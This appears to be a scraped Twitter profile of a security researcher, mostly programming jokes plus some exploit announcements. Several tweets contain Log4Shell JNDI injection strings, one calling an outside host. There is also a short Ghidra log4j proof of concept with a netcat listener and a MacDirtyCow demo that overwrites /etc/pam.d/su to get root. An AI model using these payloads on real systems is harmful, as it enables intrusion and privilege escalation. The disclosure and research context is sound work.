Zhuowei Zhang
@zhuowei
Followers
33K
Following
28K
Media
2K
Statuses
55K
link in bio ⬛⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩 ⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩🟩🟩 ⬛⬛🟧⬛🟩🟫🟫🟫🟫🟫🟫🟩 ⬛⬛🟧⬛🟫🟫🟫🟫🟫🟫🟫🟫 ⬛⬛🟧🟧🟫🟧🟩🟧🟧🟩🟧🟫🟧 ⬛⬛🟧🟧🟫🟧🟫🟧🟧🟫🟧🟫🟧 ⬛⬛⬛🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧 ⬛⬛⬛🟩🟩🟧🟧🟫🟫🟧🟧🟩🟩 ⬛🟫🟫🟫🟫🟫🟧🟧🟧🟧🟩🟩🟫 🟫🟫🟧🟫🟫🟫🟫🟩🟩🟩🟩🟩🟧 🟫🟧🟧🟧🟫🟫🟧🟫🟫🟩🟩🟧🟧
Joined October 2011
DS emulation in Augmented Reality:. Displays game as a holographic 3D model. - DS emulated with melonDS (iOS port from rileytestut's Delta).- 3D model extracted with scurest's amazing MelonRipper tool.- rendered with iOS #RealityKit.#AugmentedReality #AR.
122
3K
18K
Never spend 6 minutes doing something by hand when you can spend 6 hours failing to automate it.
39
1K
4K
You. got arbitrary code execution. on your monitor. so you can change its settings without pressing a button?!.I. just. what.
24
224
3K
I wasn't expecting Minecraft players to discover ANY world-shattering security exploits. They found TWO just this week:.- Log4j.- NSO iMessage attack using a PDF to emulate 70,000 virtual Redstone torches to build a 64-bit Redstone computer.We truly live in unprecedented times.
17
350
2K
Heartwarming: Google engineer waited 20 years for her husband when everyone thought him lost at sea.-She told suitors she won't remarry until Google has a coherent messaging strategy.-Every day, she makes a new chat app.-But every night, she cancels it before it rivals iMessage.
9
210
2K
youtube-dl has a JavaScript interpreter written in pure Python in 870 lines of code. wow.
26
282
2K
Who called it a "Zelda Speedrun" and not "Link Time Optimization".
8
486
2K
Gender reveal party leaks over 30,000 invalid BGP routes, knocking out Internet across three continents.
8
245
1K
Made an app that overwrites the iOS system font using CVE-2022-46689. It works on iOS 16.1.2 and below on unjailbroken devices. Four fonts are included: DejaVu Sans Condensed, Serif, Mono, and Choco Cooky (because Samsung).
103
227
1K
Finally, a unified Linux package manager:.${jndi:ldap://apt-get.debian.org/install/gcc}.
15
196
1K
Introducing `nft_ptr`:. C++ `std::unique_ptr` that represents each object as an NFT on the Ethereum blockchain.
21
283
1K
SELinux:.Pros: attackers can't run code.Cons: I can't run code.
11
144
1K
fuck "rust". everything i write is unsafe. raw pointers without the bounds. no, i will NOT check for overflow. string dot h. i live for this.
16
83
1K
My WWDC wishlist:. - remove .DS_Store files. that's it.that's the whole thing.
20
140
1K
iOS exploits:.builds a 64-bit virtual machine from 70,000 AND/OR/XOR/XAND logic gates inside a corrupted PDF just to run jailbreak code.Java exploits:.${jndi:ldaps://notnow.dev:3389/lol}.
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists,.activists and dissidents around the world.
8
271
1K
Elon Musk:.Twitter 2.0 will be Silicon Valley's first "everything app". Google:
23
78
1K
Ghidra's vulnerable to log4j:.__attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}"))).int a = 1;.int main(){}.$ gcc hello.c.$ nc -l 1234.Load into Ghidra; it connects to 127.0.0.1:1234. Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1.
10
274
983
I got Apple's visionOS Simulator streaming wirelessly to a Meta Quest using ALVR. Download: Demo of using the visionOS Simulator inside VR:
25
190
1K
CPU gets hit with an interrupt and wakes up with a new thread in a completely different address space.This is an isekai.
9
153
933
Java has first-class functions: you first create a class, then you add functions.
10
116
940
@_saagarjha Before posting this publically, I privately disclosed this to the NSA by whispering it to my powered-off smartphone.
6
112
803
Lost a billion dollars buying a big batch of benzene because I heard the price was about to increase. My stockpile all evaporated before I could sell it. Lesson learned: the market can remain irrational longer than your solvent can remain.
11
82
741
This is the LockPickingLawyer, and what I have for you today is a Python "Global Interpreter Lock".
8
123
743
"I'm not a transistor! I'm not a transistor!!", I continue to insist as I slowly shrink to half my original area over 18 months.
2
161
696
Let's be honest: whoever built that iMessage zero-click for NSO is a redstoner. No-one else looks at a bug that gives AND/OR/XOR/XNOR primitives, and goes,."let's build a 64-bit computer out of logic gates"!!.
5
66
652
Stop throwing exceptions.Stacks are not meant to be unwound.Years of C++ yet no real life codebase found with exceptions enabled.Wanna check for errors anyways for a laugh? We had a variable for that: it's called errno.They have played us for absolute fools.
6
58
527
Any billionaire can go to space. You want to show off your wealth and power? Play a sound on Linux.
24
54
521
Heads up! A lot of the software you’re using might be silently invading your privacy without you even knowing 😱. Don’t fear, though: one thing you can do to help is switching to Linux so your Wi-Fi stops working, blocking all malware🙈.
6
54
512
The month of "MAY" is to be interpreted as described in RFC 2119.
4
107
510
Made an app that removes the three app limit for free provisioning. Hit "Go" just before installing apps. Should work on iOS 16.1.2 and below / iOS 15.7.1 and below. Thanks to XsF1re for figuring out the methods to patch:.
Since debilitating sandbox, It would be interesting if we can patch /usr/libexec/installd using MacDirtyCow exploit! .haha. #MacDirtyCow. - Allow installing over-the-air signed apps by free developer certificate. - Removes the 3 app limit for free developer accounts.
63
135
538
A climate-controlled vault at the United States National Institute of Standards and Technology (NIST) holds the reference critical security bug for calibrating the CVE severity 10.0 score.
4
54
511
malloc "may" return null in the same way that I "may" get my act together someday and act like a real adult.
4
36
470
Epub files can run Javascript, so an insidious author can make a book that change subtlely every time it's opened to drive a reader insane.
17
276
445
The iOS SDK was released in 2008 - 13 years ago. Swift was released in 2014 - 7 years ago. Swift has been around for more than half of iOS development.
8
64
431
New blog post: I ran the iOS kernel in QEMU emulation to boot into userspace and start launchd. I also wrote a tutorial so you can examine iOS's boot process with virtualization.
5
193
427
Ultimate tournament:.vim_____ __big endian.emacs__| _ __ |__little endian. |__|.tabs______| |____Intel syntax.spaces_| |__AT&T syntax.
5
45
372
THIS C++ OPTIMIZATION IS APPLIED "AS-IF", WITHOUT WARRANTY OF ANY KIND,.
2
41
374
New blog post:.Get root on macOS 12.3.1: proof-of-concepts for @LinusHenze's CoreTrust and DriverKit bugs.My proof-of-concepts for:.CVE-2022-26766: CoreTrust allows any root certificate.CVE-2022-26763: IOPCIDevice::_MemoryAccess not checking bounds at all.
8
117
371
Selling limited edition Debian OpenSSL RSA crypto art!.Only 32768 will be minted!
9
70
361
New blog post: I learn about how iPhones boot up by emulating a tiny bit of the iOS kernel in QEMU.
7
149
374
The fundamentals of a long-lasting relationship:. - Consistency.- Availability.- Partition tolerance.
4
82
349
Stop designing binary formats!.Objects are not meant to be serialized.30-year old mature code in billions of browsers, yet no codec survives 10 minutes of fuzzing.Want to read untrusted data anyways for a laugh? We have a tool for that: it's called "ASN.1".Protobuf? Moov? NBT??.
7
44
341
To think, if you were better at BSing investors, we could've had headlines like."Kickstarter announces pivot to IPv6"."Twitter CEO going all-in on IPv6"."Ubisoft incorporates IPv6 into DLC"."Iced tea maker rebrands to 'Long Island IPv6 Corp'".
5
65
328
New blog post: You don’t need expensive equipment for VoLTE/VoWiFi research!.Learn how VoLTE/VoWiFi works by setting up your own Wi-Fi calling server with free software.
10
75
347
Attackers always run `whoami`.but attackers never ask, "how am i".
2
54
338
macOS 12's Maps app disables the new Globe view and 3D city maps on Intel Macs. However, if you turn on a debug flag, they work just fine.
9
52
340
"A security issue was discovered in Kubernetes where loading specially-crafted yaml can lead to code execution.".(.That's funny: I've been loading YAML into Kubernetes for a whole day now and it still haven't executed any code.
3
86
316
Children are no longer taught Classics in schools: many children will never read great works in the original x86.
1
29
320
Ian Beer released his proof-of-concept for CVE-2022-46689 (MacDirtyCow):.His exploit accomplishes two things I didn't know was possible:.- writing the last byte in a 16k page.- take over system daemons.
XNU race condition in vm_map_copy_overwrite_unaligned allows writing to read-only mappings
12
84
322
fuck "nixOS". everything i install gets tar xf'd into /bin. raw binaries without the functional shit. no, i will NOT reproduce your build. curl pipe bash. i live for this.
3
23
288
Find someone who trusts you as much as 90s code trusts its input.
3
89
299
We do not accept pull requests over Github. To contribute:.run `git am` to export your commit.then paste the patch into a Twitter megathread.
4
29
298
Apple updated the iPhone 5S for longer than Microsoft updated their entire mobile platform. iPhone 5S:.- released Sept 2013.- last update: July 2019 = 6 years.Windows:.- Windows Phone 8 released Oct 2012.- Windows Mobile 10 last update: Oct 2017 = 5 years.
7
49
273
Rust developer abandons "Zero C" strategy and prepares for the new normal of "living with libc".
3
20
263
iPhone 14 Pro can barely emulate a Nintendo Switch. It's enough to run a 2D Unity game with some crashes. The game is D3fau4's port of The emulator is Ryujinx (, wrapped to run on iOS. Game starts at 00:47.
16
35
298
strongest java library in the world, howeve,r it is so fragile as to execute arbitrary code when handled by any force other than the delicate touch of a lesbian .
0
60
262
iOS occasionally performs userspace reboots at night, when the device is idle, to free up memory. (.
5
31
285
10x programmer.24x programmer.32x programmer.48x programmer.52x programmer with LightScribe technology.
5
62
263
STOP RUNNING CONSTRUCTORS AT STARTUP. GLOBAL VARIABLES ARE SUPPOSED TO BE INITIALIZED WITH CONSTANTS. 40 years of C++ yet NO defined order for calling global constructors. Want to initialize your variables with code for a laugh? We have a function for that: it's called `main`.
4
39
274
Yeah, I do test-driven development: I test in production, and if a user complains, then I do development.
3
34
271
"Run x86_64 Linux binaries under ARM Linux on Apple silicon.".Docker users on Apple Silicon, rejoice!.
4
82
252
Stop optimizing code!.Behaviours are supposed to be defined.50 years of C development yet no real-world use found for strict aliasing.Want to funroll loops anyway for a laugh? We have a tool for that: it's called "Duff's device".They have taken us for absolute fSegmentation fault.
1
30
245
Intel is now extremely cautious when picking names for open source projects, a policy instituted after someone at Intel managed to name their project "PowerTOP".
10
19
248
To get the old tab bar on Safari for macOS 12, create./Library/Preferences/FeatureFlags/Domain/Safari.plist.and reboot.
9
43
251
Messaging platforms:.- Slack.- IRC.- Skype.- Discord.- Objective-C.
3
39
250
Pirates carry parrots on their shoulders to check that their stolen wares are intact: the birds are used to verify the parroty bit.
8
154
216
Please fix this, Twitter. I didn't pay $132,000 to become the cryptographically proven owner of the 1.87GB GIF of the entire Bee Movie just to get a static image in my avatar.
4
16
232
The view-source controversy shows that the Open Web must become decentralized to survive. Thus, I'm proud to announce ViewSourceCoin, my new NFT ICO where.
5
56
227
Believability of eyes.100% |o. | o. | o. | o. | o.0% |____________o__. 0 1 10 10³ 10⁵ 10⁷. Number of fireflies.
3
34
214
If you don't stop complaining, 1Password will replace the macOS app with the Android app packaged in an emulator.
4
13
215
Restore old style tabs in Safari 15:.SIP needs to be disabled.
4
23
223
"C is 'portable assembly': we should redefine 'undefined behaviour' to match the hardware, so out-of-bounds access immediately traps", says local Twitter user with a brand-new $1599.99 phone with ARM Memory Tagging Extension.
5
13
210
The "billion-dollar-nft-torrent.torrent" from the NFT Bay only has 10GB of data: the rest is a 17TB blank file. (Proof: .Which makes it worth exactly as much as all the NFTs in the world - Zero.
8
59
212
Later today, I will be disclosing a vulnerability that affects C, C++, Rust, Go, Swift, and other languages:.Bad Programmers can use these languages to write terrible code. Proof-of-concept:
2
30
218
Reminder: the ARM processor in the original iPhone/3G, the 3DS, and the Raspberry Pi Zero can execute Java bytecode natively.Ti-NSpire calculator homebrew developers have reverse engineered ARM's Jazelle technology and provided sample code you can run:
7
43
206
Me: tell me the stack layout of varargs you Bell Labs piece of shit.C: can you feel your address space burning? my ABI is beyond anything your FFI can make. you cannot kill me in a way that matters.Me loading libclang, tears streaming down my face: I'm nOT FUCKING SCARED OF YOU.
1
27
206
New blog post: Get root on macOS 13.0.1 with CVE-2022-46689, the macOS Dirty Cow bug. % ./switcharoo /etc/pam.d/su overwrite_file.bin.Testing for 10 seconds. RO mapping was modified.% su.sh-3.2#. (Demo: .
3
82
218